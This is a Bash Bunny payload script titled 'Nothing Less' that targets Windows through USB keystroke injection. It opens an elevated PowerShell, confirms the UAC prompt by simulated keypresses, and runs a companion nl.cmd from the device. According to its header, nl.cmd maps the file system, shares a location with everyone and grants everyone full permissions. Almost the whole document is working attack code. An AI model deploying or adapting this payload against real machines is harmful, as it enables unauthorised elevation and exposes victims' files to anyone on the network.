#!/bin/bash
#
# Title:         Nothing Less
# Author:        StinkyBliss
# Version:       1.0
# Target:        Windows
#
#
# Maps the file system and stores it in c:\users\tempa
# Shares a location to everyone and grants full security permissions to everyone
#
# For testing use: 'icacls "c:\Users" /remove:g Everyone /T' to remove the created security permissions
# To share a drive change the path in nl.cmd to c: remove the quotes

LED SETUP
GET SWITCH_POSITION

LED STAGE1

ATTACKMODE HID

Q GUI r
Q DELAY 100
Q STRING powershell Start-Process powershell -Verb runAs
#Q STRING powershell
Q ENTER

# Bypass UAC
Q DELAY 1000
Q LEFT
Q ENTER

LED STAGE2

ATTACKMODE HID STORAGE

# Start nl.cmd
Q STRING ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\${SWITCH_POSITION}\nl.cmd')"
Q ENTER

# Wait for nl.cmd and exit
Q DELAY 1000
Q STRING exit
Q ENTER

sync

LED FINISH